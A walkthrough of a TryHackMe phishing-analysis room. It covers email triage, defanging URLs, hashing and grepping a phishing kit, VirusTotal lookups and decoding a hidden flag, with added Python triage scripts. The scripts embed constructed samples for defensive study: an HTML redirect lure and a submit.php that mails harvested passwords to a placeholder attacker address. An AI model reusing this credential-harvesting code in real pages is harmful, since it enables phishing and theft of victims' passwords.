Snapped “Phish”-ing Line TryHackMe Walkthrough

Ankit Singh
5 min read, Jul 8, 2023


Walkthrough for the new TryHackMe phishing-analysis room, Snapped Phish-ing Line. Try it here: https://tryhackme.com/room/snappedphishingline

It is advised to go through this walkthrough only after you have tried every approach available to you.

Question 1:
Who is the individual who received an email attachment containing a PDF?

For this, open the folder called 'phish-emails' on the desktop. It contains five emails; checking each one in turn shows which recipient received a PDF attachment, which answers the first question. Go by the attachment's filename and its Content-Type in the message source rather than by the icon the mail client shows, since a kit can mislabel either.

Question 2:
What email address was used by the adversary to send the phishing emails?

The 'From' header of any of the emails gives the answer. Check that the same sender address appears in all five, which confirms one adversary mailbox was used for the whole campaign.

Question 3:
What is the redirection URL to the phishing page for the individual Zoe Duncan? (defanged format)

Note: Defanging rewrites a URL so that it is not clickable and will not auto-link, which makes it safe to paste into reports or notes without someone accidentally following it.

Open the email for the user Zoe Duncan. This email carries an attachment with a .html extension. Right-click the attachment and open it with a text editor, not a browser: viewed as text, the redirect inside it never executes, and you can read the script that sends the victim to the phishing page.

Copy the redirection URL without the surrounding apostrophes or quotation marks.

Now open the Firefox browser in the VM; CyberChef is conveniently bookmarked for us (thank you, room creator). Open CyberChef and, under 'Operations', search for "defang".

Drag and drop 'Defang URL' into the 'Recipe' area.
Paste the copied URL into the Input field and the defanged URL appears in the Output. This is the final answer to the question.
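The first three questions are one triage routine: parse each .eml, look at the attachments, read any HTML attachment as text and defang whatever URL it redirects to. The script below does that end to end. It is an added example for this walkthrough, not code from the original post or from the TryHackMe room; every message, address and URL in it is a constructed stand-in (only the recipient name Zoe Duncan comes from the question text), and the defang substitutions are assumed to match CyberChef's 'Defang URL' defaults (http to hxxp, :// to [://], dots to [.]).

```python
"""Triage a folder of .eml files the way Questions 1-3 ask: find who got a
PDF attachment, list the sender addresses, pull the redirect URL out of an
HTML attachment without opening it in a browser, and defang that URL.

Added example for this walkthrough, not code from the original post or the
TryHackMe room. All messages, addresses and URLs below are constructed
stand-ins (the room's real data differs).
"""
import email
import re
from email import policy
from email.message import EmailMessage

# Constructed lure as it might sit in an .html attachment: a script that
# bounces the victim to the credential-harvesting page.
LURE_HTML = (
    "<html><body><script>\n"
    "window.location.href = "
    "'http://kit-host.invalid/data/kit/login/?email=zoe.duncan@example.invalid';\n"
    "</script></body></html>\n"
)


def build_eml(sender, recipient, filename, payload):
    """Return a raw RFC 5322 message (bytes) carrying one attachment."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = recipient
    msg["Subject"] = "Updated account statement"
    msg.set_content("Please review the attached document.")
    if filename.lower().endswith(".pdf"):
        msg.add_attachment(payload, maintype="application", subtype="pdf",
                           filename=filename)
    else:  # text payload -> text/html attachment
        msg.add_attachment(payload, subtype="html", filename=filename)
    return msg.as_bytes()


# Stand-in for the 'phish-emails' folder: filename -> raw message bytes.
SAMPLE_EMLS = {
    "email1.eml": build_eml("accounts@phisher.invalid", "alice.harper@example.invalid",
                            "statement.pdf", b"%PDF-1.4 constructed stub"),
    "email2.eml": build_eml("accounts@phisher.invalid", "zoe.duncan@example.invalid",
                            "statement.html", LURE_HTML),
    "email3.eml": build_eml("accounts@phisher.invalid", "tom.reyes@example.invalid",
                            "statement.html", LURE_HTML.replace("zoe.duncan", "tom.reyes")),
}

URL_RE = re.compile(r"""https?://[^\s'"<>]+""", re.IGNORECASE)


def parse_eml(raw: bytes) -> EmailMessage:
    """Parse with the modern policy so headers and attachments decode cleanly."""
    return email.message_from_bytes(raw, policy=policy.default)


def attachment_names(msg: EmailMessage) -> list:
    """(filename, content-type) for every attachment part."""
    return [(part.get_filename() or "", part.get_content_type())
            for part in msg.iter_attachments()]


def recipients_with_pdf(emls: dict) -> list:
    """Question 1: who received a PDF? Check both the filename and the MIME
    type, since a kit can lie about either."""
    hits = []
    for raw in emls.values():
        msg = parse_eml(raw)
        if any(name.lower().endswith(".pdf") or ctype == "application/pdf"
               for name, ctype in attachment_names(msg)):
            hits.append(str(msg["To"]))
    return hits


def sender_addresses(emls: dict) -> set:
    """Question 2: the From header across all messages (one address expected)."""
    return {str(parse_eml(raw)["From"]) for raw in emls.values()}


def redirect_urls(msg: EmailMessage) -> list:
    """Question 3: read HTML attachments as text and extract embedded URLs,
    so the redirect is never executed."""
    urls = []
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        if part.get_content_type() == "text/html" or name.endswith((".html", ".htm")):
            body = part.get_content()
            if isinstance(body, bytes):
                body = body.decode("utf-8", "replace")
            urls.extend(URL_RE.findall(body))
    return urls


def defang(url: str) -> str:
    """Assumed to match CyberChef 'Defang URL' defaults:
    http -> hxxp, :// -> [://], . -> [.]"""
    return url.replace("http", "hxxp").replace("://", "[://]").replace(".", "[.]")


def triage(emls: dict) -> dict:
    """Recipient -> defanged redirect URLs found in that recipient's HTML attachment."""
    result = {}
    for raw in emls.values():
        msg = parse_eml(raw)
        urls = redirect_urls(msg)
        if urls:
            result[str(msg["To"])] = [defang(u) for u in urls]
    return result


if __name__ == "__main__":
    print("PDF recipients:", recipients_with_pdf(SAMPLE_EMLS))
    print("Senders:", sender_addresses(SAMPLE_EMLS))
    for who, urls in triage(SAMPLE_EMLS).items():
        print(who, "->", urls)
```

To run it against the real room files, replace SAMPLE_EMLS with a dict built by reading each file in 'phish-emails' in binary mode. The URL regex stops at quotes and whitespace, which is why the answer comes out without the apostrophes the question wants stripped; compare the defanged output against CyberChef once, since the platform checks an exact string.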

Question 4:
What is the URL to the .zip archive of the phishing kit?

The obtained redirection URL points at a domain called kennaroads.buzz. Let's visit it. Since the VM has no internet access, what you reach is the lab's own copy of the site; keep this browsing inside the VM rather than touching live phishing infrastructure from your own machine. The front page itself is not much of interest.

The URL also reveals directories within the domain, namely /data. Let's visit kennaroads.buzz/data; the server has directory listing enabled, so the folder's contents are shown.

We can see the zip archive mentioned in the question. Right-click the file, copy its URL, defang it with CyberChef as before and submit the answer.

Question 5:
What is the SHA256 hash of the phishing kit archive?

Download the zip archive to the VM and open a terminal in the Downloads folder. Use the following command to get the SHA256 hash of the archive:

sha256sum file_name.zip

Question 6:
When was the phishing kit archive first submitted? (format: YYYY-MM-DD HH:MM:SS UTC)

Checking the hints provided in the task, VirusTotal is the tool we are looking for: a free online threat-intelligence service.
Visit virustotal.com in your own browser (the provided VM doesn't have access to the internet), click the "Search" option on the homepage and paste the hash calculated for the archive in the previous question. Searching by hash only looks up existing reports; nothing is uploaded.
The "Details" tab of the file report has a History section listing the first submission date.

Question 7:
When was the phishing domain that was used to host the phishing kit archive first registered? (format: YYYY-MM-DD)

Search for the phishing domain (kennaroads.buzz) on VirusTotal. The domain report provides many details, including the Whois record on the "Details" tab, which carries the registration (creation) date we need.

Question 8:
What was the email address of the user who submitted their password twice?

Explore the domain and its sub-directories a little; there is a file that contains all of the stolen credentials. Check which user submitted their details twice.

Question 9:
What was the email address used by the adversary to collect compromised credentials?

Now it's time to examine the zip archive. Look for a file called submit.php; this script simply emails the stolen credentials to the attacker, whose address can be found in the script itself. Look closely: the recipient is the first argument to PHP's mail() call, and it may be held in a variable assigned elsewhere in the file rather than written inline.

Question 10:
The adversary used other email addresses in the obtained phishing kit. What is the email address that ends in “@gmail.com”?

One way to do this is to open each text or script file and search for the string "@gmail.com".
But since we're on Linux, we can use grep to search recursively through directories full of files, which is the fastest method.
Use the following command, run from inside the extracted archive, to get the answer to the question:

grep -r @gmail.com .
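Questions 5 and 8 to 10 are all static analysis of the kit and the server's leftovers: hash the archive, search every member for addresses, pull the mail() recipient out of submit.php, and count submissions per victim. The script below does each step offline. It is an added example for this walkthrough, not the post's or the room's own code; the archive, PHP source and credential log it builds are constructed stand-ins with made-up addresses and file names, and the submit.php layout (recipient in a variable, one mail() call) is assumed, not copied from the real kit.

```python
"""Work through Questions 5 and 8-10 on a phishing kit archive offline:
hash the zip, grep every member for e-mail addresses, pull the exfil
recipient out of submit.php, and spot the victim who posted twice.

Added example for this walkthrough, not the post's or the room's own code.
The archive, PHP source and credential log below are constructed stand-ins
with made-up addresses; the real kit's file names and code differ.
"""
import hashlib
import io
import re
import zipfile
from typing import Optional

# Constructed submit.php in the shape kits commonly use, with the recipient
# held in a variable rather than written inline in the mail() call.
SUBMIT_PHP = r"""<?php
$ip = $_SERVER['REMOTE_ADDR'];
$msg = "Email: ".$_POST['email']."\nPassword: ".$_POST['password']."\nIP: ".$ip;
$recipient = "drop.box@examplemail.invalid";
$subject = "Office365 | ".$ip;
mail($recipient, $subject, $msg);
header("Location: https://www.office.com/");
?>
"""

# Constructed second file with a different address buried in a comment.
CONFIG_PHP = "<?php\n// contact: m4ilerd3v@gmail.com\n$debug = false;\n?>\n"

# Constructed stand-in for the harvested-credentials file found on the server.
CREDENTIAL_LOG = """\
Email: alice.harper@example.invalid Password: Spring2023! IP: 198.51.100.7
Email: tom.reyes@example.invalid Password: letmein IP: 203.0.113.9
Email: alice.harper@example.invalid Password: Spring2023!! IP: 198.51.100.7
"""


def build_kit_zip() -> bytes:
    """Assemble the constructed kit as zip bytes (stand-in for the download)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Update365/office365/submit.php", SUBMIT_PHP)
        zf.writestr("Update365/office365/config.php", CONFIG_PHP)
        zf.writestr("Update365/office365/index.php", "<?php include 'config.php'; ?>")
    return buf.getvalue()


def sha256_hex(data: bytes) -> str:
    """Question 5: the same value `sha256sum` prints for the file."""
    return hashlib.sha256(data).hexdigest()


EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def grep_kit(zip_bytes: bytes, needle: str) -> dict:
    """Question 10: the `grep -r` equivalent over every archive member,
    returning member -> e-mail addresses that contain `needle`."""
    hits = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            text = zf.read(info).decode("utf-8", "replace")
            found = [m for m in EMAIL_RE.findall(text) if needle in m]
            if found:
                hits[info.filename] = found
    return hits


def exfil_recipient(php: str) -> Optional[str]:
    """Question 9: the first argument of mail(). If it is a $variable, resolve
    the literal it was assigned; if it is a string literal, return it directly."""
    m = re.search(r"mail\(\s*(\$\w+|['\"][^'\"]+['\"])", php)
    if not m:
        return None
    arg = m.group(1)
    if arg.startswith("$"):
        assign = re.search(re.escape(arg) + r"\s*=\s*['\"]([^'\"]+)['\"]", php)
        return assign.group(1) if assign else None
    return arg.strip("'\"")


def repeat_submitters(log: str) -> list:
    """Question 8: addresses that appear more than once in the credential log."""
    counts = {}
    for addr in EMAIL_RE.findall(log):
        counts[addr] = counts.get(addr, 0) + 1
    return sorted(a for a, n in counts.items() if n > 1)


if __name__ == "__main__":
    kit = build_kit_zip()
    print("sha256:", sha256_hex(kit))
    print("gmail hits:", grep_kit(kit, "@gmail.com"))
    with zipfile.ZipFile(io.BytesIO(kit)) as zf:
        php = zf.read("Update365/office365/submit.php").decode()
        print("exfil to:", exfil_recipient(php))
    print("submitted twice:", repeat_submitters(CREDENTIAL_LOG))
```

For the real archive, read the downloaded zip in binary mode instead of calling build_kit_zip(), and feed the server's credential file to repeat_submitters(). grep_kit() reads members straight from the archive, so nothing from the kit has to be extracted or executed to search it.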

Question 11:
What is the hidden flag?

We don't see anything of use in the zip archive or in the visible directories on the domain. The task hint wants us to make some adjustments to the phishing URL. After some manual brute forcing, I found something at

kennaroads.buzz/data/Update365/office365/flag.txt

Not quite the flag, but only a short stretch now.
By the looks of it, it is a base64-encoded string. Copy it into a text file (encoded.txt below).
Decode the string using the following command:

base64 -d encoded.txt > decoded.txt

We get the flag!

But REVERSED :(

You can reverse a string on Linux with the rev command; run it on the decoded output to see the actual flag :)

rev decoded.txt
